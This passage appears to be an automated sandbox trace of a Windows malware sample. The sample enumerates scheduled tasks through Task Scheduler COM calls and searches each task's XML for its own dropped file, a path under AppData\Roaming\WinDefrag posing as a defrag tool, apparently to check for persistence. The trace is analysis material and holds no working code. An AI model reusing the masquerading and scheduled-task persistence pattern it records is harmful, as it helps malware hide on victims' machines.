{190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n") returned 0x0 [0259.747] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.789] IUnknown:Release (This=0x458030) returned 0x0 [0259.789] IUnknown:Release (This=0x456b40) returned 0x0 [0259.789] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0259.791] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0259.791] IUnknown:Release (This=0x456b40) returned 0x0 [0259.791] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0259.791] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0259.791] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0259.793] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0259.793] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.793] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="HotStart") returned 0x0 [0259.794] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)\r\n Microsoft\\Windows\\MobilePC\\HotStart\r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n \r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n {06DA0625-9701-43da-BFD7-FBEEA2180A1E}\r\n \r\n \r\n") returned 0x0 [0259.796] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)\r\n Microsoft\\Windows\\MobilePC\\HotStart\r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n \r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n {06DA0625-9701-43da-BFD7-FBEEA2180A1E}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.832] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.832] IUnknown:Release (This=0x456b40) returned 0x0 [0259.832] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0259.833] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0259.833] IUnknown:Release (This=0x456b40) returned 0x0 [0259.833] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0259.833] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0259.833] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0259.835] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0259.835] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.836] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="LPRemove") returned 0x0 [0259.836] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n PT25M\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT9H\r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n") returned 0x0 [0259.838] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n PT25M\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT9H\r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.876] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.876] IUnknown:Release (This=0x456b40) returned 0x0 [0259.876] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0259.877] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0259.877] IUnknown:Release (This=0x456b40) returned 0x0 [0259.877] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0259.878] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0259.878] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0259.880] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0259.880] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.880] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="SystemSoundsService") returned 0x0 [0259.880] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n") returned 0x0 [0259.882] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.913] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.913] IUnknown:Release (This=0x456b40) returned 0x0 [0259.913] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0259.914] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0259.914] IUnknown:Release (This=0x456b40) returned 0x0 [0259.914] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0259.914] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0259.914] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0259.916] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0259.916] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.917] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="GatherNetworkInfo") returned 0x0 [0259.917] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n 7\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n") returned 0x0 [0259.919] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n 7\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.943] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.943] IUnknown:Release (This=0x456b40) returned 0x0 [0259.943] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0259.945] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0259.945] IUnknown:Release (This=0x456b40) returned 0x0 [0259.945] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0259.945] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0259.945] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0259.946] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=0) returned 0x0 [0259.946] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.946] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0259.948] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0259.948] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.948] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0259.948] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0259.948] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0259.950] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=2) returned 0x0 [0259.950] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458030) returned 0x0 [0259.951] IRegisteredTask:get_Name (in: This=0x458030, pName=0x1edb10 | out: pName=0x1edb10*="Background Synchronization") returned 0x0 [0259.951] IRegisteredTask:get_Xml (in: This=0x458030, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n \r\n PT360M\r\n false\r\n \r\n 2008-01-01T00:00:00\r\n true\r\n PT60M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n") returned 0x0 [0259.953] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n \r\n PT360M\r\n false\r\n \r\n 2008-01-01T00:00:00\r\n true\r\n PT60M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.991] IUnknown:Release (This=0x458030) returned 0x0 [0259.991] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458030) returned 0x0 [0259.991] IRegisteredTask:get_Name (in: This=0x458030, pName=0x1edb10 | out: pName=0x1edb10*="Logon Synchronization") returned 0x0 [0259.991] IRegisteredTask:get_Xml (in: This=0x458030, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \r\n \r\n \r\n true\r\n PT4M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n") returned 0x0 [0259.993] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \r\n \r\n \r\n true\r\n PT4M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.024] IUnknown:Release (This=0x458030) returned 0x0 [0260.025] IUnknown:Release (This=0x456b40) returned 0x0 [0260.025] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.026] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.026] IUnknown:Release (This=0x456b40) returned 0x0 [0260.026] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.026] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.026] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.028] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.028] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.028] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="BackgroundConfigSurveyor") returned 0x0 [0260.029] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2003)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2002)\r\n Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor\r\n \r\n \r\n \r\n \r\n 2008-05-30T03:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {EA9155A3-8A39-40b4-8963-D3C761B18371}\r\n \r\n \r\n") returned 0x0 [0260.031] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2003)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2002)\r\n Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor\r\n \r\n \r\n \r\n \r\n 2008-05-30T03:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {EA9155A3-8A39-40b4-8963-D3C761B18371}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.075] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.075] IUnknown:Release (This=0x456b40) returned 0x0 [0260.075] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.077] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.077] IUnknown:Release (This=0x456b40) returned 0x0 [0260.077] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.077] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.077] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.078] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=0) returned 0x0 [0260.078] IUnknown:Release (This=0x456b40) returned 0x0 [0260.081] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.083] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=1) returned 0x0 [0260.083] ITaskFolderCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x1edb00 | out: ppFolder=0x1edb00*=0x45a6c0) returned 0x0 [0260.084] ITaskFolder:GetTasks (in: This=0x45a6c0, flags=1, ppTasks=0x1ed990 | out: ppTasks=0x1ed990*=0x457fd0) returned 0x0 [0260.085] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edae0 | out: pCount=0x1edae0*=0) returned 0x0 [0260.085] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.085] ITaskFolder:GetFolders (in: This=0x45a6c0, flags=0, ppFolders=0x1ed978 | out: ppFolders=0x1ed978*=0x457fd0) returned 0x0 [0260.086] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edaf8 | out: pCount=0x1edaf8*=0) returned 0x0 [0260.086] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.086] TaskScheduler:IUnknown:Release (This=0x45a6c0) returned 0x0 [0260.086] IUnknown:Release (This=0x456b40) returned 0x0 [0260.086] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.086] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.086] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0260.088] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.088] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x4580a0) returned 0x0 [0260.088] IRegisteredTask:get_Name (in: This=0x4580a0, pName=0x1edb10 | out: pName=0x1edb10*="AnalyzeSystem") returned 0x0 [0260.088] IRegisteredTask:get_Xml (in: This=0x4580a0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n $(@%systemRoot%\\system32\\energy.dll,-101)\r\n $(@%systemRoot%\\system32\\energy.dll,-103)\r\n $(@%systemRoot%\\system32\\energy.dll,-102)\r\n 1.0\r\n \r\n \r\n \r\n 2008-01-01T06:00:00\r\n PT8H\r\n \r\n 14\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n PT5M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n true\r\n PT5M\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\powercfg.exe\r\n -energy -auto\r\n \r\n \r\n") returned 0x0 [0260.091] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n $(@%systemRoot%\\system32\\energy.dll,-101)\r\n $(@%systemRoot%\\system32\\energy.dll,-103)\r\n $(@%systemRoot%\\system32\\energy.dll,-102)\r\n 1.0\r\n \r\n \r\n \r\n 2008-01-01T06:00:00\r\n PT8H\r\n \r\n 14\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n PT5M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n true\r\n PT5M\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\powercfg.exe\r\n -energy -auto\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.133] IUnknown:Release 